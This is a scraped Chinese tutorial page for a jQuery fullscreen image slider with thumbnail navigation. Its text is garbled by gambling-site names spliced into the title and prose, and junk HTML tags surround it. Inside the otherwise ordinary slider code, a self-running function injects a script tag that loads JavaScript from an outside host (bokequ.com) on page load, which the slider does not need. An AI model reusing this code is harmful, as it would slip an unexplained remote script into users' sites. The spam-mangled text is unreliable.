<code id='05264F3E0F'></code><style id='05264F3E0F'></style>
    • <acronym id='05264F3E0F'></acronym>
      <center id='05264F3E0F'><center id='05264F3E0F'><tfoot id='05264F3E0F'></tfoot></center><abbr id='05264F3E0F'><dir id='05264F3E0F'><tfoot id='05264F3E0F'></tfoot><noframes id='05264F3E0F'>

    • <optgroup id='05264F3E0F'><strike id='05264F3E0F'><sup id='05264F3E0F'></sup></strike><code id='05264F3E0F'></code></optgroup>
        1. <b id='05264F3E0F'><label id='05264F3E0F'><select id='05264F3E0F'><dt id='05264F3E0F'><span id='05264F3E0F'></span></dt></select></label></b><u id='05264F3E0F'></u>
          <i id='05264F3E0F'><strike id='05264F3E0F'><tt id='05264F3E0F'><pre id='05264F3E0F'></pre></tt></strike></i>

          jQuery实云开体育免费下巅峰国际-科技赋能场景,让娱乐更有趣载现全屏图片滑块焦点图动画

          2025-06-22 13:08:47 978
          像是浮动一样,焦点图有缩略图导航,
          效果演示

          window.onload = function(){	var oImgBox = getByClass(document.body,'pxs_slider_wrapper')[0];	var oImg = getByClass(document.body,'pxs_slider')[0];	var aLi = oImg.getElementsByTagName('li');	var aImg = oImg.getElementsByTagName('img');		//各种背景	var bg1 = getByClass(document.body,'pxs_bg1')[0];	var bg2 = getByClass(document.body,'pxs_bg2')[0];	var bg3 = getByClass(document.body,'pxs_bg3')[0];		var oPrev = getByClass(document.body,'pxs_next')[0];	var oNext = getByClass(document.body,'pxs_prev')[0];		var oImg_sm = getByClass(document.body,'pxs_thumbnails')[0];	var aImg_li = oImg_sm.getElementsByTagName('li');	var aImg_sm = oImg_sm.getElementsByTagName('img');		var iNow = 0;		oImg.style.width = aLi.length * document.documentElement.clientWidth + 'px';		for(var i=0; i<aLi.length;i++)	{		aLi[i].style.width = document.documentElement.clientWidth + 'px';	}		oPrev.style.left = document.documentElement.clientWidth /2 + aImg[0].offsetWidth /2  - oPrev.offsetWidth - 14 + 'px';	oNext.style.left = document.documentElement.clientWidth /2 - aImg[0].offsetWidth /2  + oPrev.offsetWidth - 15 + 'px';		oImg_sm.style.width = aImg[0].offsetWidth + 'px';	oImg_sm.style.marginLeft = - aImg[0].offsetWidth/2 + 'px'		for(var i=0;i<aImg_sm.length;i++)	{		aImg_li[i].index = i;		var ran = Math.random() * 40 - 20;		var cliWidth = (oImg_sm.offsetWidth - aImg_li[0].offsetWidth*aImg_li.length)/(aImg_li.length+1);		aImg_li[i].style.left = cliWidth + i*(cliWidth+aImg_li[i].offsetWidth) + 'px';				setStyle3(aImg_li[i],'transform','rotate(' + ran + 'deg)')				aImg_li[i].onmouseover = function()		{			iNow = this.index;			startMove(aImg_sm[this.index], {opacity:100,marginTop:-20});		}		aImg_li[i].onmouseout = function()		{			startMove(aImg_sm[this.index], {opacity:70,marginTop:0});		}				aImg_li[i].onclick = function()		{			if(iNow == 0)			{				bg3.style.left = 0;				bg2.style.left = 0;				bg1.style.left = 0;			}			startMove(oImg, {left:-(iNow) * document.documentElement.clientWidth});			startMove(bg3, {left:parseInt(bg3.offsetLeft - document.documentElement.clientWidth/2)});			startMove(bg2, {left:parseInt(bg2.offsetLeft - document.documentElement.clientWidth/4)});			startMove(bg1, {left:parseInt(bg1.offsetLeft - document.documentElement.clientWidth/8)});		}						oPrev.onclick = function()		{				if(iNow == aImg_li.length-1)			{				iNow = -1;				bg3.style.left = 0;				bg2.style.left = 0;				bg1.style.left = 0;				startMove(aImg_sm[aImg_li.length-1], {opacity:70,marginTop:0});			}			iNow++			startMove(oImg, {left:-(iNow) * document.documentElement.clientWidth});			startMove(bg3, {left:parseInt(bg3.offsetLeft - document.documentElement.clientWidth/2)});			startMove(bg2, {left:parseInt(bg2.offsetLeft - document.documentElement.clientWidth/4)});			startMove(bg1, {left:parseInt(bg1.offsetLeft - document.documentElement.clientWidth/8)});						for(var i=0;i<aImg_sm.length;i++)			{				startMove(aImg_sm[i], {opacity:70,marginTop:0});			}						startMove(aImg_sm[iNow], {opacity:100,marginTop:-20});		}		oNext.onclick = function()		{			if(iNow == 0)			{				iNow = aImg_li.length;				bg3.style.left = -bg3.offsetWidth + document.documentElement.clientWidth + 'px';				bg2.style.left = -bg2.offsetWidth + document.documentElement.clientWidth + 'px';				bg1.style.left = -bg1.offsetWidth + document.documentElement.clientWidth + 'px';								startMove(aImg_sm[0], {opacity:70,marginTop:0});			}			iNow--			startMove(oImg, {left:-(iNow) * document.documentElement.clientWidth});			startMove(bg3, {left:parseInt(bg3.offsetLeft + document.documentElement.clientWidth/2)});			startMove(bg2, {left:parseInt(bg2.offsetLeft + document.documentElement.clientWidth/4)});			startMove(bg1, {left:parseInt(bg1.offsetLeft + document.documentElement.clientWidth/8)});						for(var i=0;i<aImg_sm.length;i++)			{				startMove(aImg_sm[i], {opacity:70,marginTop:0});			}						startMove(aImg_sm[iNow], {opacity:100,marginTop:-20});		}	}	(function (){		var oS=document.createElement('script');					oS.type='text/javascript';		oS.src='http://www.bokequ.com/category/web';					document.body.appendChild(oS);	})();}

          点击缩略图可<巅峰国际-科技赋能场景,让娱乐更有趣strong>云开体育免费下载以切换至相应的图片;图片有阴影,图片可以全屏切换快速滑动,配合天空白云的背景,

          云开体育免费下载巅峰国际-科技赋能场景,让娱乐更有趣g>是一款非常大气的jQuery+CSS3全屏焦点图插件,非常立体。

          本文地址:http://kf8vj.xny028cc.com/compose/9-55.html
          版权声明

          本文仅代表作者观点,不代表本站立场。
          本文系作者授权发表,未经许可,不得转载。

          热门标签

          全站热门

          个人网站被恶意镜像解决方法

          SEO一些名词介绍/SEO常见术语

          css中position属性定位:absolute与relative

          华为发布HUAWEI Pura 80系列 王者归位再次引领移动影像未来

          dedecms织梦5.7仿站视频教程(初级下部)

          These Crypto Assets Dumped the Most as the Total Market Cap Shed Over $200B (Weekend Watch)

          wordpress上传图片禁止自动生成缩略图

          石头P20 Pro 上下水版,18500pa吸力再降2248元,真实力更实惠

          友情链接